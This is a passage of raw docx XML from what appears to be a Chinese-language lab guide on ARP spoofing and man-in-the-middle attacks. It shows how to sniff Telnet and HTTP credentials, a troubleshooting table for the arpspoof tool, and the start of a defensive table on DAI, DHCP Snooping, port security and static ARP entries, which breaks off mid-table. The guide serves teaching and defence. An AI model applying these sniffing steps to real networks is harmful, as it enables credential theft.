        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤器可以追踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话，Telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议按字符逐个传输，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流视图中可逐字符看到用户名和密码（用户名通常后跟回车，密码亦然）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤器可追踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中的表单数据（含用户名密码等字段）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在受害者上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp -n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Linux）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Windows）可观察到网关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址已被替换为攻击机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（缓存毒化的直接证据）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</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症状</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可能原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">排查步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">arpspoof</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">无法启动，提示</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bind: Cannot assign requested address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">接口名错误或接口不存在</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ip link show</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确认接口名，修正</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;ETH_INTERFACE&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击机看不到受害者流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">转发未开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /proc/sys/net/ipv4/ip_forward</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确认值为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可见但</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Telnet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">不可见</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Telnet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务未运行；目标端口非</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在受害者上运行</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">netstat -tlnp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（预期有</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">:23</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">LISTEN）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">间隔数分钟流量消失</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">缓存超时，需持续发送欺骗应答</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确保</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">arpspoof</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">持续运行，或降低发送间隔（部分工具支持</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">-t</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">参数调节）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">仅能看到出站流量，入站不可见</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网关端欺骗未成功或无权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确认网关侧</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">arpspoof</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">正常运行；如网关不受控，仅做半双工</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">MITM（只嗅探出站）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[防御对照框（强制）]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队：ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗及中间人攻击的检测与防御</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防御层级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">技术/手段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">部署位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">局限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">数据链路层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">动态</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">检测（DAI,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Dynamic ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Inspection）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">交换机根据</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP Snooping </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">绑定表校验每个</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">报文的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP-MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对应关系，丢弃不匹配的报文</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">接入层/分布层交换机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">仅校验</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">分配的地址；静态</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">需手动添加</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">数据链路层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DHCP Snooping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">交换机监听</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务端应答，建立</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP-MAC-Port-VLAN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">绑定数据库，作为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DAI、IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">源地址防护（IP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Source </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Guard）的信任基础</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">接入层交换机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">仅防伪</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器和基于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的攻击，不直接阻止</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">数据链路层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">端口安全（Port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Security）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">限制每个交换机端口的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">地址数量，阻止攻击者</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">泛滥或变化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">接入层交换机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对受限环境（如每个端口仅一台主机）有效；多主机端口难以实施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">终端层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">静态</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">表项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在关键主机（如服务器、管理员工作站）上手动绑定网关</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">IP-MAC，操作系统优先使用静态表项，忽略动态</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">应答</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">高价值终端</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">不适用于大规模终端部署；网关更换</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">会导致断网需手动更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">终端/网络层</w:t>
            </w:r>
          </w:p>
        </w:tc>
